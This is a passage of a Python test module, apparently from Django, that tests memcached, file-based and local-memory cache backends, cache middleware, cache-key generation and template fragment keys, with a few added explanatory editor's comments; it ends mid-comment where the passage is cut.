@override_settings(CACHES=caches_setting_for_tests(
base=MemcachedCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'server_max_value_length': 9999},
))
def test_memcached_options(self):
self.assertEqual(cache._cache.server_max_value_length, 9999)
def test_default_used_when_none_is_set(self):
"""
python-memcached doesn't support default in get() so this test
overrides the one in BaseCacheTests.
"""
cache.set('key_default_none', None)
self.assertEqual(cache.get('key_default_none', default='default'), 'default')
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
client_library_name = 'pylibmc'
# libmemcached manages its own connections.
should_disconnect_on_close = False
# By default, pylibmc/libmemcached don't verify keys client-side and so
# this test triggers a server-side bug that causes later tests to fail
# (#19914). The `verify_keys` behavior option could be set to True (which
# would avoid triggering the server-side bug), however this test would
# still fail due to https://github.com/lericson/pylibmc/issues/219.
@unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail")
def test_invalid_key_characters(self):
pass
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=OSError):
with self.assertRaises(OSError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
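# Editor's note -- hedged explanation of the test above: the file-based backend
# stores a pickled expiry timestamp at the start of each cache file, so an
# empty file cannot yield a valid expiry and _is_expired() treats it as expired
# rather than raising.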
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
Settings having Cache arguments with a TIMEOUT=None create Caches that will
set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
host = 'www.example.com'
path = '/cache/test/'
factory = RequestFactory(HTTP_HOST=host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('*', ('Accept-Language', 'Cookie'), '*'),
('Accept-Language, Cookie', ('*',), '*'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
factory = RequestFactory()
def setUp(self):
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
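# Editor's note -- illustrative only: the decorator-style construction tested
# above is what cache_page() builds internally; typical usage with the view
# defined in this module would look like:
#
#   cached_view = cache_page(60, cache='other', key_prefix='foo')(hello_world_view)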
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_cached_control_private_not_cached(self):
"""Responses with 'Cache-Control: private' are not cached."""
view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
request = self.factory.get('/view/')
response = view_with_private_cache(request, '1')
self.assertEqual(response.content, b'Hello World 1')
response = view_with_private_cache(request, '2')
self.assertEqual(response.content, b'Hello World 2')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key, 'template.cache.foo.493e283d571a73056196f1a68efd0f66')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key, 'template.cache.bar.17c1a507a0cb58384f4c639067a93520')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key, 'template.cache.spam.06c8ae8e8c430b69fb0a6443504153dc')
def test_with_ints_vary_on(self):
key = make_template_fragment_key('foo', [1, 2, 3, 4, 5])
self.assertEqual(key, 'template.cache.foo.7ae8fd2e0d25d651c683bdeebdb29461')
def test_with_unicode_vary_on(self):
key = make_template_fragment_key('foo', ['42º', '😀'])
self.assertEqual(key, 'template.cache.foo.7ced1c94e543668590ba39b3c08b0237')
def test_long_vary_on(self):
key = make_template_fragment_key('foo', ['x' * 10000])
self.assertEqual(key, 'template.cache.foo.3670b349b5124aa56bdb50678b02b23a')
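# Editor's note -- illustrative only: make_template_fragment_key() mirrors the
# {% cache %} template tag, so the key for a fragment cached in a template as
#
#   {% load cache %}
#   {% cache 500 foo abc %} ... {% endcache %}
#
# can be computed with make_template_fragment_key('foo', ['abc']) and passed to
# cache.delete() to invalidate that fragment.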
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
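# Editor's note -- illustrative sketch of the mechanism the test above relies
# on: the cache handler keeps backend instances in thread-local storage, so
# each thread lazily creates its own connection for a given alias. Roughly
# (create_connection is a hypothetical helper):
#
#   import threading
#   _local = threading.local()
#   def get_cache(alias):
#       caches_for_thread = getattr(_local, 'caches', None)
#       if caches_for_thread is None:
#           caches_for_thread = _local.caches = {}
#       if alias not in caches_for_thread:
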